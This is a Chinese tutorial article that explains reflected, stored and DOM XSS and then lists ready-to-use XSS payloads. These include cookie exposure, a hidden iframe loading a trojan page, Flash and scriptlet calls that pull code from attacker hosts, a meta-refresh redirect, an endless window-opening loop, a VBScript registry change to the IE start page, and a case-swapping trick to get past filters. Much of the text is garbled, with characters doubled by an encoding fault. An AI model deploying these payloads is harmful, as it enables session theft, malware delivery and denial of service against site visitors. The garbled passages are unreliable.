一、什么是XSS?

XSS全稱是Cross Site Scripting即跨站腳本，當(dāng)目標(biāo)網(wǎng)站目標(biāo)用戶瀏覽器渲染HTML文檔的過程中，出現(xiàn)了不被預(yù)期的腳本指令并執(zhí)行時(shí)，XSS就發(fā)生了。

二、XSS分類

XSS有三類：反射型XSS(非持久型)、存儲(chǔ)型XSS(持久型)和DOM XSS

反射型XSS
發(fā)出請求時(shí)，XSS代碼出現(xiàn)在URL中，作為輸入提交到服務(wù)器端，服務(wù)器端解析后響應(yīng)，XSS代碼隨響應(yīng)內(nèi)容一起傳回給瀏覽器，最后瀏覽器解析執(zhí)行XSS代碼。這個(gè)過程像一次反射，故叫反射型XSS。

存儲(chǔ)型XSS
存儲(chǔ)型XSS和反射型XSS的差別僅在于，提交的代碼會(huì)存儲(chǔ)在服務(wù)器端（數(shù)據(jù)庫，內(nèi)存，文件系統(tǒng)等），下次請求目標(biāo)頁面時(shí)不用再提交XSS代碼

最典型的例子是留言板XSS，用戶提交一條包含XSS代碼的留言存儲(chǔ)到數(shù)據(jù)庫，目標(biāo)用戶查看留言板時(shí)，那些留言的內(nèi)容會(huì)從數(shù)據(jù)庫查詢出來并顯示，瀏覽器發(fā)現(xiàn)有XSS代碼，就當(dāng)做正常的HTML與Js解析執(zhí)行，于是觸發(fā)了XSS攻擊。

DOM XSS
DOM XSS和反射型XSS、存儲(chǔ)型XSS的差別在于DOM XSS的代碼并不需要服務(wù)器參與，觸發(fā)XSS靠的是瀏覽器端的DOM解析，完全是客戶端的事情。

附常見的XSS攻擊方法

1、這個(gè)應(yīng)該都知道
<script>alert("test")</script> 常用于測試 是否存在跨站

2、<script>window.alert(document.cookie);</script>
這句代碼將會(huì)彈出壹個(gè)包含有瀏覽者cookie信息的對話框，如果用戶已經(jīng)通過帳號登陸網(wǎng)站，在顯示的cookie信息中將會(huì)包含有用戶的賬戶名和密碼。

3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,當(dāng)用戶瀏覽該 頁時(shí)，將彈出壹個(gè)高爲(wèi)200，寬爲(wèi)200的網(wǎng)頁窗口，在其中打開的頁面是http://www.pete.cn/default.asp

4、跨站攻擊的形式是多樣的，不僅可以在網(wǎng)頁中插入跨站腳本代碼，而且可以在flash文件中插入跨站腳本代碼，實(shí)現(xiàn)跨站攻擊。由于flash文件有較高 的安全性，用戶通常對flash文件的警惕性不夠，因此用flash文件進(jìn)行跨站攻擊的成功率很高。如果將這個(gè)含有跨站腳本代碼的flash文件插入到網(wǎng) 頁中，例如制作成網(wǎng)頁banner或者廣告，那么中招的用戶將更多。
flash跨站是通過在flash文件中插入動(dòng)作腳本來實(shí)現(xiàn)的，通過在flash文件“幀”的“動(dòng)作”中插入跨站腳本代碼來實(shí)現(xiàn)跨站攻擊，其實(shí)現(xiàn)方法入下：
首先運(yùn)行flash文件制作工具flash8.exe，新建壹個(gè)空白的flash文檔。然后選中其中的第壹幀，進(jìn)入界面下方的“動(dòng)作”編輯界面，在Action Script中插入我們的跨站腳本代碼
getURL("http://網(wǎng)頁木馬地址", "_blank", "GET");
loadMovieNum("http://www.pete.cn/test.swf", 0);

5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
這就是 傳說中的框架 - - 膜拜吧 還有JS 也可以使用，比框架更隱蔽

6、Refresh到另壹個(gè)頁面：

<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm"> 

7、scriptlet引入另壹個(gè)頁面：

<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object> 

下面來幾段長的 但是 記住 要慎用 ?。?/p>

1、打開無數(shù)個(gè)瀏覽器窗口，直至CPU超負(fù)荷，非關(guān)機(jī)不可：

<script language="JavaScript"> 
<!-- 
while (true) 
{ 
window.open("URI"); //如果URI就是當(dāng)前頁本身，那就更具破壞性。 
} 
//--> 
</script> 

2、 修改注冊表（IE 主頁）：

<script language="VBScript"> 
Set RegWsh = CreateObject("WScript.Shell") 
'設(shè)置IE瀏覽器默認(rèn)頁 
RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com" 
</script> 

有時(shí)候，</script> 可以替換大小寫 來躲過過濾

我最后要說的壹句話就是“害人終害己”，切記！

到此這篇關(guān)于XSS攻擊常識及常用腳本 的文章就介紹到這了,更多相關(guān)XSS 攻擊腳本 內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持腳本之家！

最新評論